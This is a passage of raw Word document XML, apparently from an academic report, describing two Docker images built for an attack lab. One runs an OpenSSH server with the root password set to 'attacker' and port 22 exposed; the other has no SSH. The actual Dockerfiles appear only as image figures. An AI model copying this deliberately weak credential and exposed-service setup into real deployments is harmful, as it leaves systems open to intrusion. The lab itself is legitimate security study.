        <w:t xml:space="preserve">mainly </w:t>
      </w:r>
      <w:r w:rsidR="00E235F9">
        <w:t xml:space="preserve">uses two </w:t>
      </w:r>
      <w:r w:rsidR="001F7CB1">
        <w:t>Dockerfiles</w:t>
      </w:r>
      <w:r w:rsidR="00A42C7B">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001F7CB1">
        <w:t xml:space="preserve"> one with </w:t>
      </w:r>
      <w:r w:rsidR="00A42C7B">
        <w:t xml:space="preserve">SSH port exposed and the other </w:t>
      </w:r>
      <w:r w:rsidR="00663FE1">
        <w:t>without SSH enabled</w:t>
      </w:r>
      <w:r w:rsidR="00B50477">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A11B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF7B0F">
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00C43C81">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00DF7B0F">
        <w:t xml:space="preserve">alpine Docker image </w:t>
      </w:r>
      <w:r w:rsidR="00313DDC">
        <w:t xml:space="preserve">pulled from Docker Hub </w:t>
      </w:r>
      <w:r w:rsidR="00CE3C61">
        <w:t xml:space="preserve">is used to add </w:t>
      </w:r>
      <w:r w:rsidR="00080127">
        <w:t xml:space="preserve">necessary </w:t>
      </w:r>
      <w:r w:rsidR="00CE3C61">
        <w:t xml:space="preserve">tools </w:t>
      </w:r>
      <w:r w:rsidR="001C66F2">
        <w:t>and packages</w:t>
      </w:r>
      <w:r w:rsidR="001B4733">
        <w:t xml:space="preserve"> during the </w:t>
      </w:r>
      <w:r w:rsidR="00384B4B">
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00653001">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005A11B7">
        <w:t xml:space="preserve">Therefore, for </w:t>
      </w:r>
      <w:r w:rsidR="00CD531C">
        <w:t>this attack</w:t>
      </w:r>
      <w:r w:rsidR="00DF7B0F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CD531C">
        <w:t xml:space="preserve"> the implementation process starts creating the two Docker images locally.</w:t>
      </w:r>
      <w:r w:rsidR="002A2999">
        <w:t xml:space="preserve"> The first Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00457801">
        <w:t xml:space="preserve">installs and configures </w:t>
      </w:r>
      <w:r w:rsidR="00D440A5">
        <w:t xml:space="preserve">OpenSSH server </w:t>
      </w:r>
      <w:r w:rsidR="00E07631">
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidR="00603E3F">
        <w:t xml:space="preserve"> a container starts</w:t>
      </w:r>
      <w:r w:rsidR="00BC2780">
        <w:t>, as shown in figure 30.</w:t>
      </w:r>
      <w:r w:rsidR="00A45516">
        <w:t xml:space="preserve"> OpenSSH is </w:t>
      </w:r>
      <w:r w:rsidR="00403A30">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00600266">
        <w:t xml:space="preserve"> protocol that provides </w:t>
      </w:r>
      <w:r w:rsidR="00AF2CCA">
        <w:t xml:space="preserve">a secure communication between </w:t>
      </w:r>
      <w:r w:rsidR="00D00849">
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidR="00A22937">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D00849">
        <w:t xml:space="preserve"> over a network</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-856414830"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BA2F88">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BA2F88">
            <w:instrText xml:space="preserve"> CITATION ubu21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E00DDF">
            <w:instrText xml:space="preserve"> \m doc213</w:instrText>
          </w:r>
          <w:r w:rsidR="00BA2F88">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[87, 88]</w:t>
          </w:r>
          <w:r w:rsidR="00BA2F88">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D00849">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A22937">
        <w:t xml:space="preserve"> The Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00D1670F">
        <w:t>is created bas</w:t>
      </w:r>
      <w:r w:rsidR="007E1052">
        <w:t xml:space="preserve">ed on Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00186845">
        <w:t>16.04 base image.</w:t>
      </w:r>
      <w:r w:rsidR="007D2638">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00016D9D">
        <w:t xml:space="preserve">It also sets the root password </w:t>
      </w:r>
      <w:r w:rsidR="001432F2">
        <w:t>to “</w:t>
      </w:r>
      <w:r w:rsidR="001432F2" w:rsidRPr="00E71D03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="001432F2">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004C691B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B36A2D">
        <w:t>inside the Docker container</w:t>
      </w:r>
      <w:r w:rsidR="008B50F7">
        <w:t>, as shown in the figure</w:t>
      </w:r>
      <w:r w:rsidR="00891E3B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008B50F7">
        <w:t xml:space="preserve"> on line 4</w:t>
      </w:r>
      <w:r w:rsidR="007C4212">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00737CF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089161D4" w14:textId="5314DA13" w:rsidR="004A2A67" w:rsidRDefault="00737CF4" w:rsidP="0005151D">
      <w:r>
        <w:t xml:space="preserve">Further, it exposes </w:t>
      </w:r>
      <w:r w:rsidR="001A62E9">
        <w:t>the default SSH port 22</w:t>
      </w:r>
      <w:r w:rsidR="008850B1">
        <w:t xml:space="preserve"> to allow the Docker container </w:t>
      </w:r>
      <w:r w:rsidR="009C24AD">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="008850B1">
        <w:t>listen on this port.</w:t>
      </w:r>
      <w:r w:rsidR="00711202">
        <w:t xml:space="preserve"> Finally,</w:t>
      </w:r>
      <w:r w:rsidR="007F424D">
        <w:t xml:space="preserve"> it starts the </w:t>
      </w:r>
      <w:r w:rsidR="00B84241">
        <w:t xml:space="preserve">OpenSSH </w:t>
      </w:r>
      <w:r w:rsidR="00320BCA">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00C94167">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00320BCA">
        <w:t xml:space="preserve">background when the container </w:t>
      </w:r>
      <w:r w:rsidR="005E163B">
        <w:t>is started.</w:t>
      </w:r>
      <w:r w:rsidR="00395C19">
        <w:t xml:space="preserve"> Similarly, the second Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00C713D4">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="0015378C">
        <w:t>analogous</w:t>
      </w:r>
      <w:r w:rsidR="006047DF">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="005712C2">
        <w:t xml:space="preserve"> the first Dockerfile</w:t>
      </w:r>
      <w:r w:rsidR="008B5EA3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00857308">
        <w:t xml:space="preserve"> except </w:t>
      </w:r>
      <w:r w:rsidR="008B5EA3">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00857308">
        <w:t>does not expose the SSH port</w:t>
      </w:r>
      <w:r w:rsidR="006047DF">
        <w:t xml:space="preserve"> 22</w:t>
      </w:r>
      <w:r w:rsidR="008F2B0C">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="008B5EA3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008F2B0C">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00944DE3">
        <w:t>, as shown in figure 31</w:t>
      </w:r>
      <w:r w:rsidR="008F2B0C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FC05B5">
        <w:t xml:space="preserve"> For clarity, each Dockerfile </w:t>
      </w:r>
      <w:r w:rsidR="00E85A84">
        <w:t xml:space="preserve">provides comments for each command used </w:t>
      </w:r>
      <w:r w:rsidR="000A1D54">
        <w:t>to create the Docker images files</w:t>
      </w:r>
      <w:r w:rsidR="004C292C">
        <w:t>, as shown in figure</w:t>
      </w:r>
      <w:r w:rsidR="00072AF0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004C292C">
        <w:t xml:space="preserve"> 30 and 31.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6A9ED" w14:textId="5EC19275" w:rsidR="00101FE3" w:rsidRDefault="00101FE3" w:rsidP="006A275A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20404398" wp14:editId="39E658A5">
            <wp:extent cx="4783925" cy="26416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84436" cy="2641882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C7E53" w14:textId="65F2A2C6" w:rsidR="00944DE3" w:rsidRDefault="00944DE3" w:rsidP="007F5E4B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc86858621"/>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EF78FF" w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dockerfile for OpenSSH-server with </w:t>
      </w:r>
      <w:r w:rsidR="007F5E4B" w:rsidRPr="007F5E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSH port exposed.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="72D81F06" w14:textId="77777777" w:rsidR="004F1253" w:rsidRPr="004F1253" w:rsidRDefault="004F1253" w:rsidP="004F1253"/>
    <w:p w14:paraId="39A41BC0" w14:textId="0409D968" w:rsidR="00C322CB" w:rsidRDefault="00CD4C4C" w:rsidP="00CD4C4C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4079B2CE" wp14:editId="6003CF7C">
            <wp:extent cx="4556760" cy="2393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56760" cy="2393950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E62920" w14:textId="7D234EA6" w:rsidR="004C292C" w:rsidRDefault="004C292C" w:rsidP="00B8006E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc86858622"/>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B8006E" w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dockerfile with no SSH port exposed.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="468C5A13" w14:textId="38B7183E" w:rsidR="00B12A70" w:rsidRPr="00B12A70" w:rsidRDefault="0041569C" w:rsidP="00B12A70">
      <w:r>
        <w:t xml:space="preserve">Next, the </w:t>
      </w:r>
      <w:r w:rsidR="004D1E45">
        <w:t xml:space="preserve">first image </w:t>
      </w:r>
      <w:r w:rsidR="0050242C">
        <w:t xml:space="preserve">for the SSH enabled </w:t>
      </w:r>
      <w:r w:rsidR="004D1E45">
        <w:t xml:space="preserve">is created </w:t>
      </w:r>
      <w:r w:rsidR="00DF045B">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="005015A0">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00DF045B">
        <w:t>Docker commands shown in figure 32</w:t>
      </w:r>
      <w:r w:rsidR="001215C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D44DF6">
        <w:t xml:space="preserve"> The image is </w:t>
      </w:r>
      <w:r w:rsidR="001215C0">
        <w:t>tagged as ssh</w:t>
      </w:r>
      <w:r w:rsidR="00D44DF6">
        <w:t xml:space="preserve">_enabled </w:t>
      </w:r>
      <w:r w:rsidR="00896A24">
        <w:t>just for simplicity and clarity.</w:t>
      </w:r>
      <w:r w:rsidR="00BC4548">
        <w:t xml:space="preserve"> The Docker engine </w:t>
      </w:r>
      <w:r w:rsidR="00572C4A">
        <w:t>then creates a virtual environment (container) for the OpenSSH server</w:t>
      </w:r>
      <w:r w:rsidR="0025101C">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="00572C4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F3ECE">
        <w:t xml:space="preserve">based on the instructions and commands </w:t>
      </w:r>
      <w:r w:rsidR="0025101C">
        <w:t>of the base image.</w:t>
      </w:r>
      <w:r w:rsidR="006B114D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0049250C">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="006B114D">
        <w:t>imila</w:t>
      </w:r>
      <w:r w:rsidR="0049250C">
        <w:t xml:space="preserve">rly, the second image is created </w:t>
      </w:r>
      <w:r w:rsidR="004067B9">
        <w:t xml:space="preserve">using the commands </w:t>
      </w:r>
      <w:r w:rsidR="005C0A38">
        <w:t>given in figure 33, tagged as ssh_disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997B517" w14:textId="5E1412E2" w:rsidR="004F1253" w:rsidRDefault="005527B2" w:rsidP="00BE1645">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FB3AF5B" wp14:editId="4623633F">
            <wp:extent cx="4717809" cy="2125980"/>
            <wp:effectExtent l="0" t="0" r="698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18610" cy="2126341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43256169" w14:textId="251C7EB2" w:rsidR="0083675E" w:rsidRPr="009C0AC6" w:rsidRDefault="009D0D10" w:rsidP="009C0AC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc86858623"/>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: image created for the SSH enabled </w:t>
      </w:r>
      <w:r w:rsidR="00F95E8C" w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="3E3A427F" w14:textId="77777777" w:rsidR="00130829" w:rsidRDefault="00130829" w:rsidP="004F1253"/>
    <w:p w14:paraId="6E82DB78" w14:textId="3652ADDB" w:rsidR="00130829" w:rsidRDefault="00130829" w:rsidP="00BE1645">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CAEF0B" wp14:editId="6F867467">
            <wp:extent cx="4717415" cy="2510790"/>
            <wp:effectExtent l="0" t="0" r="6985"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18291" cy="2511256"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE47F88" w14:textId="0B8B7926" w:rsidR="00F95E8C" w:rsidRDefault="00F95E8C" w:rsidP="009C0AC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc86858624"/>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Docker image created for the NO</w:t>
      </w:r>
      <w:r w:rsidR="009C0AC6" w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>N-SSH application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="13226D73" w14:textId="00343145" w:rsidR="006E128A" w:rsidRPr="006E128A" w:rsidRDefault="005002DF" w:rsidP="006E128A">
      <w:r>
